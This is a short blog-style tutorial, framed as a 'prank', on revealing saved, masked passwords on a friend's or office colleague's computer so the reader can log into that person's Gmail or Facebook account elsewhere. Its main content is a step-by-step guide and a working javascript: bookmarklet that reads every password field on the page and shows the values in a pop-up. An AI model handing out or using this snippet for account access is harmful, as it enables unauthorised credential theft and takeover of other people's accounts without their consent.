You might have been in this postion more often then not that you are using your friend’s computer or any of the office colleague’s Computer and your are about to login into your facebook,gmail,yahoo,hotmail or by matter any website and you see the username and password already filled,though you can login in at that moment and try to change the settings of that particular user!!.

but what when you want to Prank you friend’s account at some different place then the User’s PC,for this you would want to know the password ,which is either in “****”  or “…..” marked,and to get to know the password without the “**” marks or how to hack the password all you need to do is follow this simple steps
step1} first go to that login page where you think that your friend would have been logged in previously e.g Gmail or Facebook
step 2} We here are considering gmail account,you can just see the “****” marks in thePassword field,
step3} Just copy paste the below code in your browser address

javascript:(function() {var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j) %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i) %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22) %20s%20+=%20f[i].value%20+%20%22 %22;%20}%20}%20if %20(s)%20alert(%22Password Hacked by this pageis:%22%20+%20s);%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this %20page.%22);})();
step4} Now you would be able to see the password in a pop up window.


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